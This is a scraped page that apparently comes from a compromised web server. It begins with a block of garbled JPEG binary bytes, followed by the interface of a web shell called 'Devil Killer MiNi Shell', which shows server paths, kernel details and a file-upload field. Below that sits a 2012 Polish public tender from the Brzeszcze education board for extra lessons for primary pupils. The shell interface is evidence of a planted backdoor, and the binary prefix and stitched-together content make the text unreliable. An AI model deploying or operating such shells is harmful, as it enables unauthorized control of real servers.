JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120221/41565-N-2012.html

<p class="kh_header"><b>Brzeszcze: REALIZACJA ZAJĘĆ DODATKOWYCH WSPIERAJĄCYCH INDYWIDUALIZACJĘ PROCESU DYDAKTYCZNEGO DLA UCZNIÓW KLAS I - III SZKÓŁ PODSTAWOWYCH GMINY BRZESZCZE w ramach projektu PO KL: ASY Z NASZEJ KLASY</b><br>
<b>Numer ogłoszenia: 41565 - 2012; data zamieszczenia: 21.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Zarząd Edukacji w Brzeszczach , ul. Kosynierów 20, 36-620 Brzeszcze, woj. małopolskie, tel. 032 2111593, faks 032 2111593.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gze.brzeszcze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REALIZACJA ZAJĘĆ DODATKOWYCH WSPIERAJĄCYCH INDYWIDUALIZACJĘ PROCESU DYDAKTYCZNEGO DLA UCZNIÓW KLAS I - III SZKÓŁ PODSTAWOWYCH GMINY BRZESZCZE w ramach projektu PO KL: ASY Z NASZEJ KLASY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja zajęć dodatkowych wspierających indywidualizację procesu dydaktycznego dla uczniów klas I-III szkół podstawowych na terenie Gminy Brzeszcze w ramach projektu PO KL: ASY Z NASZEJ KLASY, Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki - CPV: 80.00.00.00-4 - usługi edukacyjne i szkoleniowe. 2. Zakres, ilość i rodzaj zajęć w poszczególnych szkołach określają szczegółowe zadania stanowiące części zamówienia. Czas trwania jednej godziny zajęć przewiduje się jako 60 minut pracy. Wszystkie zajęcia będą odbywały się poza podstawą programową. Zajęcia odbywać się będą w przedziałach czasowych: III-VI.2012 r., IX.2012-VI.2013 r. oraz IX-XII.2013 r. 3. Przedmiot zamówienia obejmuje 39 zadań:
Szkoła Podstawowa nr 1 w Brzeszczach - zadania od 1 do 12 Zadanie nr 1: Zajęcia rozwojowe informatyczne rozwijające umiejętności posługiwania się komputerem i korzystania z programów edukacyjnych: 4 grupy po 8 osób x 30 h = 120 h, tj.: grupa nr 1: III-VI 2012 r  - 30 h,  grupa nr 2: IX-XII 2012 r. - 30 h, grupa nr 3: II-VI 2013 r. - 30 h, grupa nr 4: IX-XII 2013 r. - 30 h. Zadanie nr 2: Zajęcia rozwojowe doskonalące umiejętności w zakresie języka angielskiego: 2 grupy po 8 osób x 30 h = 60 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: II-VI 2013 r. - 30 h. Zadanie nr 3: Zajęcia rozwojowe przyrodniczo-ekologiczne: 2 grupy po 8 osób x 30 h = 60 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX-XII 2013 r. - 30 h. Zadanie nr 4: Zajęcia rozwojowe rozwijające uzdolnienia wokalno-taneczne: 
1 grupa po 8 osób - 30 h: IX-XII 2012 r. Zadanie nr 5: Zajęcia rozwojowe rozwijające zdolności plastyczne: 1 grupa po 8 osób - 30 h: IX-XII 2012 r. Zadanie nr 6: Zajęcia rozwojowe rozwijające zainteresowania i umiejętności matematyczne:
1 grupa po 8 osób - 30 h: II-VI 2013 r. Zadanie nr 7: Zajęcia rozwojowe techniczne rozwijające umiejętności manualne: 1 grupa po 8 osób - 30 h: IX-XII 2013 r. Zadanie nr 8: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy: 4 grupy po 4 osoby x 30 h = 120 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX-XII 2012 r. - 30 h, grupa nr 3: II-VI 2013 r. - 30 h, grupa nr 4: IX-XII 2013 r. - 30 h. Zadanie nr 9: Zajęcia dydaktyczno-wyrównawcze dla uczniów z trudnościami w czytaniu: 3 grupy po 8 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX-XII 2012 r. - 30 h, grupa nr 3: II-VI 2013 r. - 30 h. Zadanie nr 10: Zajęcia dydaktyczno-wyrównawcze dla uczniów z trudnościami matematycznymi: 2 grupy po 8 osób  x 30 h = 60 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2 : IX-XII 2012 r. - 30 h. Zadanie nr 11: Zajęcia socjoterapeutyczne rozwijające umiejętności komunikacyjne, społeczne i interpersonalne: 2 grupy po 5 osób x 30 h = 60 h, tj.: grupa nr 1: II-VI 2013 r. - 30 h, grupa nr 2: IX-XII 2013 r. - 30 h. Zadanie nr 12: Zajęcia gimnastyki korekcyjno-kompensacyjnej mające na celu korygowanie wad postawy:1 grupa po 10 osób x 30 h: IX-XII 2013 r. Szkoła Podstawowa nr 2 w Brzeszczach - zadania od 13 do 21: Zadanie nr 13: Zajęcia dydaktyczno-wyrównawcze dla uczniów z trudnościami matematycznymi: 3 grupy po 8 osób x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012 -VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 14: Zajęcia rozwojowe dla uczniów uzdolnionych w zakresie matematyki: 6 grup po 8 osób x 30 h = 180 h, tj.: dwie grupy: III-VI 2012 r. - 2 x 30 h = 60 h, cztery grupy: IX 2012 -VI 2013 r. - 4 x 30 h = 120 h. Zadanie nr 15: Zajęcia rozwojowe dla uczniów uzdolnionych w zakresie matematyki z wykorzystaniem technik origami: 3 grupy po 8 osób x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012 - VI 2013 r. - 30 h. grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 16: Specjalistyczne zajęcia terapeutyczne z biblioterapii z wykorzystaniem bajek jako metody redukcji lęku u uczniów: 3 grupy po 10 osób x 30 h = 90 h, tj.:grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012 - VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 17: Zajęcia gimnastyki korekcyjno-kompensacyjnej mające na celu korygowanie wad postawy: 3 grupy po 5 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012 - VI 2013 r. - 30 h
grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 18: Zajęcia dydaktyczno-wyrównawcze dla uczniów z trudnościami w czytaniu i pisaniu: 9 grup po 8 osób  x 30 h = 270 h, tj.: Trzy grupy: III-VI 2012 r. - 3 x 30 h = 90 h, Trzy grupy: IX 2012 - VI 2013 r. - 3 x 30 h = 90 h, Trzy grupy: IX-XII 2013 r. - 3 x30 h = 90 h. Zadanie nr 19: Zajęcia socjoterapeutyczne rozwijające umiejętności komunikacyjne, społeczne i interpersonalne: 3 grupy po 10 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012 - VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 20: Zajęcia rozwojowe rozwijające zdolności plastyczne: 3 grupy po 8 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012 - VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 21: Zajęcia rozwojowe w zakresie nauk przyrodniczych: 3 grupy po 8 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012 - VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Szkoła Podstawowa w Jawiszowicach - zadania od 22 do 27: Zadanie nr 22: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy: 6 grup po  4 osoby  x 30 h = 180 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: III-VI 2012 r. - 30 h, grupa nr 3: IX-XII 2012 r. - 30 h, grupa nr 4: II-VI 2013 r. - 30 h, grupa nr 5: II-VI 2013 r. - 30 h, grupa nr 6: IX-XII 2013 r. - 30 h. Zadanie nr 23: Zajęcia psychoedukacyjne dla uczniów nadpobudliwych  ze zmiennymi nastrojami mające na celu zmniejszenie napięć i niepokoju: 3 grupy po  5 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012 - VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 24: Zajęcia rozwijające uzdolnienia artystyczne (plastyczno-muzyczne): 3 grupy po  8 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012-VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 25: Zajęcia dydaktyczno-wyrównawcze dla uczniów z trudnościami w czytaniu i pisaniu: 3 grupy po  8 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012-VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 26: Zajęcia gimnastyki korekcyjnej mające na celu korygowanie wad postawy: 3 grupy po  8 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012-VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 27: Zajęcia rozwojowe w zakresie nauk matematyczno-przyrodniczych: 3 grupy po  8 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012-VI 2013 r. - 30 h,grupa nr 3: IX-XII 2013 r. - 30 h. Szkoła Podstawowa w Skidziniu - zadania od 28 do 31:Zadanie nr 28: Zajęcia rozwojowe dla uczniów uzdolnionych w zakresie języka polskiego i matematyki:
3 grupy po  5 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012-VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 29: Zajęcia dydaktyczno-wyrównawcze dla uczniów z trudnościami w języku polskim i matematyce: 3 grupy po  6 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012-VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 30: Zajęcia gimnastyki korekcyjnej mające na celu korygowanie wad postawy:
3 grupy po  7 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012-VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 31: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy: 3 grupy po  4 osoby  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012-VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Szkoła Podstawowa w Przecieszynie - zadania od 32 do 35: Zadanie nr 32: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy:3 grupy po  4 osoby  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012-VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h, Zadanie nr 33: Zajęcia dydaktyczno-wyrównawcze dla uczniów z trudnościami w czytaniu i pisaniu: 3 grupy po  8 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012-VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 34: Zajęcia dydaktyczno-wyrównawcze dla uczniów z trudnościami w matematyce:
3 grupy po  8 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012-VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 35: Zajęcia rozwojowe dla uczniów uzdolnionych w zakresie nauk matematyczno-przyrodniczych: 3 grupy po  8 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012-VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Szkoła Podstawowa w Zasolu - zadanie od 36 do 39. Zadanie nr 36: Zajęcia dydaktyczno-wyrównawcze dla uczniów z trudnościami w czytaniu i pisaniu: 3 grupy po  5 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012-VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 37: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy: 3 grupy po  2 osoby  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012-VI 2013 r. - 30 h
grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 38: Zajęcia rozwojowe dla uczniów uzdolnionych w zakresie nauk matematyczno-przyrodniczych: 3 grupy po  5 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012-VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h. Zadanie nr 39: Zajęcia dydaktyczno-wyrównawcze dla uczniów z trudnościami w matematyce: 3 grupy po  5 osób  x 30 h = 90 h, tj.: grupa nr 1: III-VI 2012 r. - 30 h, grupa nr 2: IX 2012-VI 2013 r. - 30 h, grupa nr 3: IX-XII 2013 r. - 30 h..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 39.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży pisemne oświadczenie z art. 22 ust. 1 Ustawy PZP zgodnie z wzorem stanowiącym załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże wykonanie co najmniej 1 usługi w okresie trzech lat przed upływem terminu składania ofert, polegającej na prowadzeniu zajęć lub pracy z dziećmi ze szkół podstawowych - załącznik nr 5 do SIWZ. Wykonawca złoży pisemne oświadczenie z art. 22 ust. 1 Ustawy PZP zgodnie z wzorem stanowiącym załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże dysponowanie osobami (co najmniej 1 osobą), zdolnymi do wykonania zamówienia, na każdy rodzaj zajęć, na który składa ofertę i które będą uczestniczyć w wykonywaniu zamówienia - załącznik nr 4 do SIWZ. Wykonawca złoży pisemne oświadczenie z art. 22 ust. 1 Ustawy PZP zgodnie z wzorem stanowiącym załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży pisemne oświadczenie z art. 22 ust. 1 Ustawy PZP zgodnie z wzorem stanowiącym załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokument(-y) potwierdzający (-e) należyte wykonanie usług wymienionych w Wykazie usług wykonanych (lub wykonywanych) w okresie trzech lat przed upływem terminu składania ofert zgodnie z załącznikiem nr 5 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Na podstawie treści art. 144 Ustawy Prawo Zamówień Publicznych zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, za wyjątkiem przypadków określonych w niniejszej specyfikacji istotnych warunków zamówienia, w tym: a. Zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, np. zmiana wysokości podatku VAT. b. Zmianę terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub Zamawiającego, które to przyczyny każda ze stron musi udokumentować, pod warunkiem, że taka zmiana zostanie zaakceptowana przez Instytucję Dofinansowującą i Zamawiający nie straci dofinansowania. c. Ze względu na dofinansowanie zadania możliwa jest zmiana umowy w zakresie konieczności dostosowania umowy z Wykonawcą do postanowień umowy o dofinansowanie. d. Działania lub zaniechania osób trzecich, uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron. 2. Warunki dokonania zmian umowy: a. Uzasadnienie zmiany prawidłową realizacją umowy. b.Wszelkie zmiany umowy, o którym mowa specyfikacji istotnych warunków zamówienia muszą być dokonywane z zachowaniem art. 140 ust. 3 Ustawy Prawo Zamówień Publicznych stanowiącego, że umowa podlega unieważnieniu, w części wykraczającej poza określenie przedmiotu zamówienia zawarte w specyfikacji istotnych warunków zamówienia. c.Wszelkie zmiany umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
